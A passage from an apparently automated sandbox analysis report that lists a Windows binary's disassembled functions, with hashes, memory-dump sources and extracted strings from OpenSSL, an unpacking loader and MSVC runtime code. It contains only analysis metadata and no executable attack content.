                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB15584B
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB155897
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDFB156243,?,?,?,?,?,?,?,?,00007FFDFB15425B), ref: 00007FFDFB1558C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
                                                              • API String ID: 2248877218-1119032718
                                                              • Opcode ID: 3af54960f1234cedf813c05304838762c682ff4381afd251c87a5d5e4fffb560
                                                              • Instruction ID: dd8305387326e8eb882f3a2c05e7cee63ae286a8998ab95cf89dfe1c8ba18468
                                                              • Opcode Fuzzy Hash: 3af54960f1234cedf813c05304838762c682ff4381afd251c87a5d5e4fffb560
                                                              • Instruction Fuzzy Hash: 0991CE1AF1E64340FFA097269574BB82A929F55B9CF845131D93E862FEEF2CF8058310
                                                              Function 00007FFE13338C24 Relevance: 54.6, APIs: 3, Strings: 28, Instructions: 352COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                              • API String ID: 2943138195-1388207849
                                                              • Opcode ID: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
                                                              • Instruction ID: 103b16990cb3126ff3ca67b5f0ee1527c66371cc39fd5b5512cba41f37ebec70
                                                              • Opcode Fuzzy Hash: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
                                                              • Instruction Fuzzy Hash: 21F18672E08E12CCF7148B66C4543BCAAB0BB24B64F408575DA2D76AB8DF3DE548C744
                                                              Function 00007FFE1333C3C8 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 288COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID: `anonymous namespace'
                                                              • API String ID: 2943138195-3062148218
                                                              • Opcode ID: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
                                                              • Instruction ID: 6456096be111212c3b70512f496932b4e290c21b3e1648c8b8727e111d9ccee7
                                                              • Opcode Fuzzy Hash: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
                                                              • Instruction Fuzzy Hash: 3EE17B72A08F869DEB21CF26D4801ACB7A0FB64B64F448075EA6D27B75DF38E554C704
                                                              Function 00007FFDFAFA1C21 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 267COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
                                                              • API String ID: 2248877218-3630080479
                                                              • Opcode ID: b020904c3bad4ffa821751f85af9fd884556f26034922e71bf6aa46b876580fc
                                                              • Instruction ID: 65cffc37e659e598cf92bba775a4ef2b5192889bca5e0cfeede92be42d88b54a
                                                              • Opcode Fuzzy Hash: b020904c3bad4ffa821751f85af9fd884556f26034922e71bf6aa46b876580fc
                                                              • Instruction Fuzzy Hash: D1C17E65F0A64381FB14EB11A460AF96351AF86B94F448172E96D0FBEDEF3CE505E700
                                                              Function 00007FF623F781D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF623F79390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF623F745F4,00000000,00007FF623F71985), ref: 00007FF623F793C9
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF623F786B7,?,?,00000000,00007FF623F73CBB), ref: 00007FF623F7822C
                                                                • Part of subcall function 00007FF623F72810: MessageBoxW.USER32 ref: 00007FF623F728EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                              • API String ID: 1662231829-930877121
                                                              • Opcode ID: d247d3a0ca85f1815ed913d402e51827366718a31552b00c9fe28dde0a2555e6
                                                              • Instruction ID: 210f545aca279fdbe736a32dcc277a68150ebe780f5dce6e01e88ae3445402a8
                                                              • Opcode Fuzzy Hash: d247d3a0ca85f1815ed913d402e51827366718a31552b00c9fe28dde0a2555e6
                                                              • Instruction Fuzzy Hash: BE519411A2CA8251FE509F25FD532BA6250EF94784F5444B6EA0EEB6D5EF2CE704C342
                                                              Function 00007FF623F71600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                              • API String ID: 2050909247-1550345328
                                                              • Opcode ID: 135dd65cea76e94f08e5c441af6a025afc8d429d9f77b9d7694e6b2e68aeb0e7
                                                              • Instruction ID: ca4af423212090532dc370921ed3d90e48efc542040214ae54fae4ac991ff141
                                                              • Opcode Fuzzy Hash: 135dd65cea76e94f08e5c441af6a025afc8d429d9f77b9d7694e6b2e68aeb0e7
                                                              • Instruction Fuzzy Hash: D0519121B0864392EE149F12BD421B963A0BF84794F9445B5ED0CAB7D6DF3CEB4AC702
                                                              Function 00007FFE1333A83C Relevance: 22.9, APIs: 15, Instructions: 358COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID:
                                                              • API String ID: 2943138195-0
                                                              • Opcode ID: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
                                                              • Instruction ID: fc67de46a3bb214997786aec54381718f792ea8bb1017910154836679f476ef7
                                                              • Opcode Fuzzy Hash: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
                                                              • Instruction Fuzzy Hash: 5EF19E72E08A829EF711DF66D4901FCB7B0EB24B58B4080B5DA6D67AA5DF38D50AC344
                                                              Function 00007FFE1333D20C Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 349COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
                                                              • API String ID: 2943138195-2309034085
                                                              • Opcode ID: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
                                                              • Instruction ID: 63fa61e67e2b72083da91ff90146798266b610f20d94588df1bc6c16fbc23e64
                                                              • Opcode Fuzzy Hash: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
                                                              • Instruction Fuzzy Hash: E4E1A362E0CE428CFB15AB66C9581FCA7A0AF21B64F4481B5DD2D37AB5DF3CA544C348
                                                              Function 00007FFDFAFA4E44 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 205registryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
                                                              • String ID: $OpenSSL$OpenSSL: FATAL$no stack?
                                                              • API String ID: 1270133462-2963566556
                                                              • Opcode ID: 59a87a5942c62673d1eda9d489acfd17bfac18cd3cdeff8e5dabbfc5dde2d1c3
                                                              • Instruction ID: be1510df885d1ea4c0870e400a60550ffd646cbadf66d6f9fa1bcc8acfbb3a74
                                                              • Opcode Fuzzy Hash: 59a87a5942c62673d1eda9d489acfd17bfac18cd3cdeff8e5dabbfc5dde2d1c3
                                                              • Instruction Fuzzy Hash: CA91D472B19B8386EB208F25E4605E97768FF45794F404735EA6D8BAE9EF38D145C300
                                                              Function 00007FFDFAEFDD20 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007B6570
                                                              • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192
                                                              • API String ID: 4069847057-2661540032
                                                              • Opcode ID: e2bbb32d1d3d283f2e394a8df4aae2e8d2f1c393b3f5a88a0770c77b7573a677
                                                              • Instruction ID: 3dd665a9735523d7bedbd22c46be6e06a0903f604efdafe9606b342074a2d32c
                                                              • Opcode Fuzzy Hash: e2bbb32d1d3d283f2e394a8df4aae2e8d2f1c393b3f5a88a0770c77b7573a677
                                                              • Instruction Fuzzy Hash: 17416132F0CA469AF7189B10D9A0B7837A0EF58B94F444675EA2E876DCDF2DE550C740
                                                              Function 00007FFE13332CE4 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 309COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 3436797354-393685449
                                                              • Opcode ID: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
                                                              • Instruction ID: 77d87eb2d65fb6b883b1db717b2d0ffa3ec216416816f18d9e013c90d6f92a82
                                                              • Opcode Fuzzy Hash: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
                                                              • Instruction Fuzzy Hash: 42D16236A08F418EEB109F66D4402ADB7A0FB65BA8F408175EE9D67765CF3CE494C704
                                                              Function 00007FFDFAEE247D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007E133311
                                                              • String ID: ..\s\ssl\t1_enc.c$client finished$extended master secret$key expa$master s$n$nsio$server finished
                                                              • API String ID: 3807962231-2209449699
                                                              • Opcode ID: dfa8aec1510d3dd9a5f7309a3e3d747647d746a0efbc19ea33d4be1b9a8d2319
                                                              • Instruction ID: a762c62da71fb71737a6c0471b935d114306c2858226e5b3f07304570f67bf87
                                                              • Opcode Fuzzy Hash: dfa8aec1510d3dd9a5f7309a3e3d747647d746a0efbc19ea33d4be1b9a8d2319
                                                              • Instruction Fuzzy Hash: 9851A362B0C78286E7648F15E8507A9A7A4FF54BE4F048375EE9D0BB99DF3CD6848700
                                                              Function 00007FF623F72180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                              • String ID: P%
                                                              • API String ID: 2147705588-2959514604
                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                              • Instruction ID: 89f2da045359394ccb0e94c433d1ba73240892a0e581e39fe40e0eabf9260645
                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                              • Instruction Fuzzy Hash: E451E826618BA186DA349F26F8181BAB7A1F798B61F004135EFDE83794DF3CD145DB10
                                                              Function 00007FF623F780C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                              • String ID: Needs to remove its temporary files.
                                                              • API String ID: 3975851968-2863640275
                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                              • Instruction ID: 4e24e54cd96b882655b6824943e17ecdc95c4ab6a90a0b710c498de3b344169f
                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                              • Instruction Fuzzy Hash: 90218621B08A42C2EF458F7ABC561796251FF88F90F5882B1DA1DD73E5DF6CDA918302
                                                              Function 00007FFDFA112700 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986363655.00007FFDFA111000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FFDFA110000, based on PE: true
                                                              • Associated: 00000001.00000002.1986336831.00007FFDFA110000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA174000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA1C3000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA21C000.00000040.00000001.01000000.00000015.sdmpDownload File
